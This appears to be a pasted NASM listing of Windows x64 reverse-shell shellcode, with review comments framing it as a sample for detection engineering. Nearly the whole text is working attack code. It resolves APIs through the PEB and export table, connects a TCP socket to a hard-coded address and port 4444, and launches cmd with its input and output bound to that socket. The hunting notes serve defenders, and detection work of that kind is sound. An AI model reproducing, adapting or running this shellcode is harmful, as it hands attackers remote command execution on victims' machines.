
Untitled

a guest
Jun 24th, 2022
BITS 64

;-----------------------------------------------------------------------
; NOTE(review): Windows x64 reverse-shell shellcode sample in NASM syntax,
; Microsoft x64 calling convention (args in rcx, rdx, r8, r9; caller
; reserves stack space before each call). Kept as a reference sample for
; detection engineering; the original author's comments are left as-is.
;
; Observable behaviour (each point is visible in the code below):
;   * resolves the kernel32 base by walking PEB (gs:[0x60]) -> Ldr ->
;     in-memory-order module list instead of relying on an import table;
;   * finds GetProcAddress by scanning kernel32's export name table for the
;     8-byte immediate "GetProcA";
;   * every further API name ("LoadLibraryA", "ws2_32.dll", "WSAStartup",
;     "WSASocketA", "connect", "CreateProcessA") is assembled at run time
;     from immediates pushed onto the stack -- no data section is used;
;   * creates a TCP socket (af=2, type=1, protocol=6) and connects to a
;     hard-coded IPv4 address and port built in a sockaddr_in on the stack;
;   * calls CreateProcessA for a "cmd" command line with a STARTUPINFOA
;     whose hStdInput / hStdOutput / hStdError all hold that socket, and
;     what appears to be dwFlags = 0x100 (STARTF_USESTDHANDLES -- confirm
;     against the STARTUPINFOA layout).
;
; Detection / hunting notes for defenders:
;   * a cmd.exe whose standard handles are a socket, spawned by a process
;     that has an outbound connection, is the classic reverse-shell signal
;     in process-creation telemetry (std handles pointing at \Device\Afd);
;   * PEB/Ldr walking, export-table parsing and stack-built API strings are
;     generic shellcode traits -- pair them with execution from unbacked or
;     RWX memory and the WSASocketA -> connect -> CreateProcessA sequence;
;   * the destination address and port are literal constants and serve as
;     network IoCs for this specific sample only; they are trivially
;     changed, so the behavioural signals above are the durable ones.
;-----------------------------------------------------------------------

SECTION .text
global start
start:

;push rbp
;mov rbp, rsp

;sub rsp, 0x28 ; 40 bytes of shadow space
;and rsp, 0FFFFFFFFFFFFFFF0h ; Align the stack to a multiple of 16 bytes

; Parse PEB and find kernel32
; NOTE(review): gs:[0x60] is the 64-bit PEB self-pointer; a read of it
; followed by Ldr list traversal is a common API-resolution heuristic.

xor rcx, rcx ; RCX = 0
mov rax, [gs:rcx + 0x60] ; RAX = PEB
mov rax, [rax + 0x18] ; RAX = PEB->Ldr
mov rsi, [rax + 0x20] ; RSI = PEB->Ldr.InMemOrder
lodsq ; RAX = Second module
xchg rax, rsi ; RAX = RSI, RSI = RAX
lodsq ; RAX = Third(kernel32)
mov rbx, [rax + 0x20] ; RBX = Base address

; Parse kernel32 PE

xor r8, r8 ; Clear r8
mov r8d, [rbx + 0x3c] ; R8D = DOS->e_lfanew offset
mov rdx, r8 ; RDX = DOS->e_lfanew
add rdx, rbx ; RDX = PE Header
mov r8d, [rdx + 0x88] ; R8D = Offset export table
add r8, rbx ; R8 = Export table
xor rsi, rsi ; Clear RSI
mov esi, [r8 + 0x20] ; RSI = Offset namestable
add rsi, rbx ; RSI = Names table
xor rcx, rcx ; RCX = 0
mov r9, 0x41636f7250746547 ; GetProcA

; Loop through exported functions and find GetProcAddress

Get_Function:

inc rcx ; Increment the ordinal
xor rax, rax ; RAX = 0
mov eax, [rsi + rcx * 4] ; Get name offset
add rax, rbx ; Get function name
cmp QWORD [rax], r9 ; GetProcA ?
jnz Get_Function
xor rsi, rsi ; RSI = 0
mov esi, [r8 + 0x24] ; ESI = Offset ordinals
add rsi, rbx ; RSI = Ordinals table
mov cx, [rsi + rcx * 2] ; Number of function
xor rsi, rsi ; RSI = 0
mov esi, [r8 + 0x1c] ; Offset address table
add rsi, rbx ; ESI = Address table
xor rdx, rdx ; RDX = 0
mov edx, [rsi + rcx * 4] ; EDX = Pointer(offset)
add rdx, rbx ; RDX = GetProcAddress
mov rdi, rdx ; Save GetProcAddress in RDI

; Use GetProcAddress to find the address of LoadLibrary

mov rcx, 0x41797261 ; aryA
push rcx ; Push on the stack
mov rcx, 0x7262694c64616f4c ; LoadLibr
push rcx ; Push on stack
mov rdx, rsp ; LoadLibraryA
mov rcx, rbx ; kernel32.dll base address (rbx never changes so we could use it later for CreateProcessA)
sub rsp, 0x20 ; Allocate stack space for function call
call rdi ; Call GetProcAddress
add rsp, 0x20 ; Cleanup allocated stack space
mov rsi, rax ; LoadLibrary saved in RSI

;getws2_32:
mov rcx, 0x6c6c ; ll
push rcx ; Push on the stack
mov rcx, 0x642e32335f327377 ; d.32_2sw
push rcx ; Push on the stack
mov rcx, rsp ; ws2_32.dll
sub rsp, 0x20 ; Allocate stack space for function call
call rsi ; call Loadlibrary (stored in rsi) and find ws2_32.dll
add rsp, 0x20 ; Cleanup allocated stack space
mov r15, rax ; base address of ws2_32.dll saved in local variable r15 (winsock handle)

;getWSAStartup:
mov rcx, 0x7075 ; pu
push rcx ; Push on the stack
mov rcx, 0x7472617453415357 ; tratSASW
push rcx ;Push on the stack
mov rdx, rsp ; copy WSAStartup from stack to 2nd argument (rdx is the 2nd arg)
mov rcx, r15 ; winsock handler
sub rsp, 0x20 ; Allocate stack space for function call
call rdi ; GetProcAddress(ws2_32.dll, WSAStartup)
add rsp, 0x20 ; Cleanup allocated stack space
mov r14, rax ; ws2_32.WSAStartup saved in r14


;callWSAStartUp:
; stack style
xor rcx, rcx
mov cx, 0x190 ; 0x190 works only when 0x28 bytes are subtracted, no more, no less!!!
sub rsp,rcx
lea rdx,[rsp]
xor rcx, rcx
mov cx,0x202
sub rsp, 0x28
call r14 ; call WSAStartup(MAKEWORD(2, 2), wsadata_pointer)
add rsp, 0x28
add rsp, 0x190




;getWSASocketA:
xor rdx, rdx
xor rcx, rcx
mov rcx, 0x4174 ; 'At' original
push rcx ; push on stack
mov rcx, 0x656b636f53415357 ; 'ekcoSASW'
push rcx ; push on stack
mov rdx, rsp ; copy string of WSASocketA contents from stack to rdx (2nd arg for GetProcAddress)
mov rcx, r15 ; socket handler ws2_32.dll
sub rsp, 0x30
call rdi ; GetProcAddress(ws2_32.dll, WSASocketA)
add rsp, 0x30 ; Cleanup allocated stack space: standard is 32 bytes but 2 pushes = 16 more = 48 = 0x30
mov r13, rax ; save ws2_32.WSASocketA to r13

sub rsp, 0x38
;callWSASocketA:
mov qword[rsp+0x20],0
mov qword[rsp+0x28], 0
xor r9, r9
mov r9, 0
xor r8, r8
mov r8, 0x6 ; protocol=6
xor rdx, rdx
mov rdx, 0x1 ; type=1
xor rcx, rcx
mov rcx, 0x2 ; af=2
call r13 ; call WSASocketA
add rsp, 0x28 ; Cleanup allocated stack space = 48 bytes = 0x30
mov r14, rax ; save socket descriptor of WSASocketA to r14

loadconnect:
mov rcx, 0x7463656e6e6f63 ; nnoc
push rcx
mov rdx, rsp
mov rcx, r15
sub rsp, 0x30
call rdi
add rsp, 0x30

callConnect:
; ;set up sockaddr_in
; NOTE(review): the address and port below are literal immediates -- the
; only sample-specific network IoCs in this shellcode.
mov rdx, 0x761da8c0 ;ip 192.168.29.118
push rdx ;push sin_addr
push word 0x5c11 ;0x115c = (port 4444)
xor edx, edx
mov dl, 2
push word dx
mov rdx, rsp
mov rcx, r14
sub rsp, 0x30
call rax
add rsp, 0x30

getCreateProcessA:
mov rcx, 0x41737365636f ; ecor
push rcx
mov rcx, 0x7250657461657243 ; aerC
push rcx ; push the pointer to stack
mov rdx, rsp
mov rcx, rbx
sub rsp, 0x30
call rdi
add rsp, 0x30
mov rbx, rax

;STARTUPINFOA+PROCESS_INFORMATION
;----------------------------------
push byte 0x12 ; We want to place (18 * 4) = 72 null bytes onto the stack
pop rcx ; Set ECX for the loop
xor r11,r11
push_loop:

push r11 ; push a null dword
loop push_loop ; keep looping untill we have pushed enough nulls
lea r12,[rsp]

mov dl,104

xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx

xor rdx,rdx
mov dl,255
inc rdx

mov [r12+0x3c],edx
; NOTE(review): the socket from WSASocketA (r14) is written into all three
; std-handle slots of the STARTUPINFOA; a child cmd.exe whose std handles
; are a socket is the durable telemetry signal for this technique.
mov [r12+0x50],r14 ; HANDLE hStdInput;
mov [r12+0x58],r14 ; HANDLE hStdOutput;
mov [r12+0x60],r14 ;HANDLE hStdError;


;createprocessA_calling
sub rsp, 0x70

push 'cmdA'
mov [rsp+3],byte dl

lea rdx,[rsp]
inc rcx
mov [rsp+32],rcx
xor rcx,rcx

xor r8,r8

mov [rsp+40],r8
mov [rsp+48],r8
mov [rsp+56],r8
lea r9,[r12]
mov [rsp+64],r9
lea r9,[r12+104]
mov [rsp+72],r9

xor r9,r9

call rbx ;createprocessA